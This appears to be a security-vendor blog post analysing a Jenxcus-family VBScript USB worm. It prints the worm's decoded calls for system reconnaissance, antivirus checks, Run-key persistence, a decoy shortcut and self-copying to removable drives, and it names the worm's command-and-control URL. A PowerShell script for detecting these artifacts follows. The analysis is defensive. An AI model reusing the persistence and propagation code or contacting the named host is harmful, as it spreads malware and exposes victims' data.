USB worms: Still wriggling on to under-protected computers after all these years
Pieter Arntz · 2025-02-24 · via Threat Walkthroughs – ThreatDown by Malwarebytes
USB symbol header image

Malware doesn’t care if it’s being talked about or not.

When you think of malware, you probably don’t think of old school USB worms, but our Managed Detection and Response (MDR) experts actually noticed an increase in USB worms in 2024. In this article we present an example of a USB worm from the Jenxcus family they recently ran into.

USB worms spread through infected USB drives. When an unsuspecting user plugs an infected drive into their computer, a dropper initiates a payload and infects the system. In turn, the infected system will then infect every USB device that’s plugged into it.

full VBE code

Some of the commands are clearly gathering system information, such as the computer’s hostname and the current username.

IWshShell3.ExpandEnvironmentStrings("%computername%");
IWshShell3.ExpandEnvironmentStrings("%username%");

Other commands query system information using Windows Management Instrumentation (WMI).

ISWbemServicesEx.ExecQuery("select * from win32_logicaldisk");
ISWbemServicesEx.ExecQuery("select * from win32_operatingsystem");

The script also adds two startup entries to the registry for persistence.

IWshShell3.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\Microsoft", "wscript.exe //B \"C:\\Users\\{username}\\AppData\\Roaming\\Microsoft.vbe\"", "REG_SZ");
IWshShell3.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\Microso", "wscript.exe //B \"C:\\Users\\{username}\\AppData\\Roaming\\Microsoft.vbe\"", "REG_SZ");

It also creates a fake Microsoft shortcut on the F: drive (usually a removable drive) that runs Microsoft.vbe to trick users.

IWshShell3.CreateShortcut("F:\System Volume Information.lnk");
IWshShortcut.TargetPath("cmd.exe");
IWshShortcut.Arguments("/c start Microsoft.vbe&start explorer System Volume Information&exit");

It queries the active antivirus protection:

ISWbemServicesEx.ExecQuery("select * from antivirusproduct", "wql", "0");

And it displays the typical USB worm behavior by copying itself to the F: drive, where it will patiently wait for the next person to plug the flash drive into a Windows system.

IFileSystem3.CopyFile("C:\\Users\\{username}\\AppData\\Roaming\\Microsoft.vbe", "F:\\Microsoft.vbe", "true");
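As an added example (not code from the ThreatDown article or from the worm), here is a PowerShell hunt for the artifacts described above: Run-key values that launch wscript.exe //B on a .vbe under AppData\Roaming, plus a root-level .vbe or a decoy "System Volume Information.lnk" on removable drives. The paths and patterns are taken from the trace lines above; the drive letter is not assumed, every removable drive is checked.

```powershell
$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
)
$Findings = @()

# 1. Run-key values that start wscript.exe silently (//B) on a .vbe/.vbs
#    under the user's Roaming profile, as the worm's two RegWrite calls do.
foreach ($Key in $RunKeys) {
    if (-not (Test-Path $Key)) { continue }
    $Props = (Get-ItemProperty -Path $Key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' }   # drop PSPath/PSProvider noise
    foreach ($P in $Props) {
        if ($P.Value -match 'wscript(\.exe)?\s+//B\b' -and
            $P.Value -match '\\AppData\\Roaming\\[^"]+\.vb[es]') {
            $Findings += [pscustomobject]@{
                Type = 'RunKey'; Where = "$Key\$($P.Name)"; Detail = $P.Value
            }
        }
    }
}

# 2. Removable drives (DriveType 2): a script in the root, or a .lnk that
#    poses as "System Volume Information" and chains cmd.exe to a .vbe.
$Shell = New-Object -ComObject WScript.Shell
foreach ($Drive in (Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2')) {
    $Root = $Drive.DeviceID + '\'
    foreach ($File in (Get-ChildItem -Path $Root -Force -File -ErrorAction SilentlyContinue)) {
        if ($File.Extension -in @('.vbe', '.vbs')) {
            $Findings += [pscustomobject]@{ Type = 'RootScript'; Where = $File.FullName; Detail = '' }
        } elseif ($File.Extension -eq '.lnk') {
            $Lnk = $Shell.CreateShortcut($File.FullName)   # CreateShortcut loads an existing .lnk
            $Decoy = $File.BaseName -eq 'System Volume Information'
            $Chain = $Lnk.TargetPath -match 'cmd\.exe$' -and $Lnk.Arguments -match 'start\s+\S+\.vb[es]'
            if ($Decoy -or $Chain) {
                $Findings += [pscustomobject]@{
                    Type = 'DecoyShortcut'; Where = $File.FullName
                    Detail = "$($Lnk.TargetPath) $($Lnk.Arguments)"
                }
            }
        }
    }
}

if ($Findings.Count -eq 0) { 'No Jenxcus-style artifacts found.' } else { $Findings | Format-Table -AutoSize }
```

Treat a hit as a lead for triage, not proof of infection: the Run-key pattern in particular should be confirmed by inspecting the referenced .vbe file before anything is removed.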

The script also references a URL at update32.hopto.org:82/is-ready/ for command and control, which has been active since 2015. Because of the /is-ready/ part of the URL, we suspect that this worm is a WSH Remote Access Trojan (RAT) in the Jenxcus family.

The WSH RAT (Windows Script Host Remote Access Trojan) has been around since at least 2013. Among other things, it is capable of stealing system information and stealing passwords from web browsers and email clients. It is also capable of disabling anti-malware solutions and Windows’ UAC (User Account Control).

Maybe the deprecation of VBScript in 2027 will finally put an end to these worms. Until then, ThreatDown’s Application Block can stop unwanted scripting engines, and its Device Control can prevent unauthorized devices from accessing sensitive data and ensure that only approved devices can interact with your network.